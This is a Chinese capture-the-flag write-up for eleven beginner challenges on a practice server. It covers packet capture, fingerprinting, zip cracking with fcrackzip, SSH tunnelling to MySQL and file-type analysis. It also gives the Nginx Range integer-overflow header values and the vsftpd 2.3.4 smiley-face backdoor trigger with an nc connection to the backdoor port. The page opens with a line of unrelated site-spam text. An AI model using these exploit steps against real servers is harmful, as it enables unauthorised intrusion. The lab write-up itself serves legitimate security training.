寻花问柳专注做一家男人爱的网站,石家庄百度推广家庄网站建设,青海省安建设管理部门网站,开发区二手房房价最新信息文章目录 1、Burp抓包2、指纹识别3、压缩包解密4、Nginx整数溢出漏洞5、PHP代码基础6、linux基础命令7、Mysql数据库基础8、目录扫描9、端口扫描10、docker容器基础11、文件类型 1、Burp抓包
抓取http://47.100.220.113:8007/的返回包#xff0c;可以拿到包含flag的txt文件。… 文章目录 1、Burp抓包2、指纹识别3、压缩包解密4、Nginx整数溢出漏洞5、PHP代码基础6、linux基础命令7、Mysql数据库基础8、目录扫描9、端口扫描10、docker容器基础11、文件类型 1、Burp抓包
抓取http://47.100.220.113:8007/的返回包可以拿到包含flag的txt文件。 访问http://47.100.220.113:8007/27726623fabee80870ab072b70178308.txt获取flag。
2、指纹识别
使用whatweb进行指纹识别命令whatweb http://47.100.220.113:8109/获取flag。 whatweb -v http://47.100.220.113:8109/-v查看详细信息
3、压缩包解密
下载提供的flag.zip和wordlist.txt使用fcrackzip工具破解zip密码命令
fcrackzip -D -p Wordlist.txt -u flag.zip
# -D代表使用字典
# -p指定字典
# -u只显示破解出来的密码其他错误的密码不显示出4、Nginx整数溢出漏洞
Nginx整数溢出漏洞的影响版本Nginx 0.5.6 – 1.13.2 注意两个响应头
X-Proxy-Cache: HIT # 表示命中
X-Proxy-Cache: MISS # 表示未命中漏洞利用
range1 17208 # 请求demo.png返回包大小为16585要想向前读取数据差值最好保持在600
range2 0×8000000000000000-172089,223,372,036,854,767,331
Range: -range1,-range2 # 使用负数5、PHP代码基础
直接使用system函数执行系统命令
6、linux基础命令
ssh远程连接命令
ssh usrnameip -p port
ssh test47.100.220.113 -p 2233find命令查询文件
find / -name *flag* -type f 2/dev/null # 在/目录下寻找文件名为*flag*的文件不显示报错信息
flag{82782fd75008071871ad76e3a8b8794d}九阴真经上卷找不到似乎被删了只有下卷。 7、Mysql数据库基础
手工ssh隧道转发
ssh -g -f -N -L 8888:mysql:3306 test47.100.220.113 -p 2244 # 密码为whalwlwuhan
# -g此选项允许远程主机连接到本地端口转发的绑定地址上。
# -f此选项让 SSH 在后台运行即以守护进程模式执行。这样可以在启动 SSH 连接后立即返回到命令提示符而不会阻塞终端。
# -N此选项指示 SSH 不要执行任何远程命令。通常SSH 会尝试登录到远程主机并执行指定的命令但在此情况下我们只需要创建端口转发而不需要远程执行命令。
# -L 8888:mysql:3306这是端口转发的设置部分。-L 后面的参数指定了本地端口、目标主机和目标端口的对应关系。
# 在本地主机上创建一个 SSH 连接并将本地的 8888 端口转发到远程的 MySQL 服务器的 3306 端口。mysql -h127.0.0.1 -P8888 -utest -ptestflag在whalwl数据库中。 Navicat连接
8、目录扫描
命令
python dirsearch.py -u http://47.100.220.113:8008/ -w dicc.txt -e php -t 1 -m head
# -u指定域名
# -w指定字典
# -e指定扫描的文件拓展名
# -t设置线程
# -m设置请求方式head请求只返回响应头没有返回内容看wp是由web.zip文件的但是这里没有所以搞不定了。 9、端口扫描
使用nmap进行端口扫描
nmap -p 10021 -sV 47.100.220.113
# -p指定端口
# -sV探测服务版本vsftpd 2.3.4存在一个经典的笑脸漏洞~ 笑脸漏洞原理在vsftpd 2.3.4版本中在登录输入用户名时输入:)类似于笑脸的符号会导致服务处理开启6200后门端口直接执行系统命令。注意10021端口上ftp的后门端口为16200。
ftp 47.100.220.113 -P 10021 # ftp连接
kali:) # 用户名
kali # 密码nc 47.100.220.113 1620010、docker容器基础
docker pull registry.cn-shanghai.aliyuncs.com/whalwl/docker_test # 拉取镜像
docker run -it registry.cn-shanghai.aliyuncs.com/whalwl/docker_test /bin/bash # 创建容器并进入容器退出会自动停止容器
find / -name *fla* -type f 2/dev/null # 查找flag文件
cat /root/this_is_flag11、文件类型
下载给的文件后进行解压
tar -zxvf flag.tar.gz # 解压出flag文件
file flag # 识别file文件类型
unzip flag # 解压会得到五个flag文件file flag-1 # 为JPEG图片文件直接打开file flag-2 # 为exe文件linux下不能运行exe文件需要放到windows下运行
# 注意改名为flag-2.exefile flag-3 # 为ELF文件linux下能直接运行
./flag-3file flag-4 # 为PE32可执行文件linux下不能直接运行添加.exe的后缀放到windows下运行添加完后根据icon可以看出这是一个python打包成的exe程序。python解包
file flag-4 # 为PE32可执行文件linux下不能直接运行添加.exe的后缀放到windows下运行
python pyinstxtractor.py flag-4.exe # 解包file flag-5 # 为JAR文件直接用zip解压
unzip flag-5 使用jd-gui对class文件反编译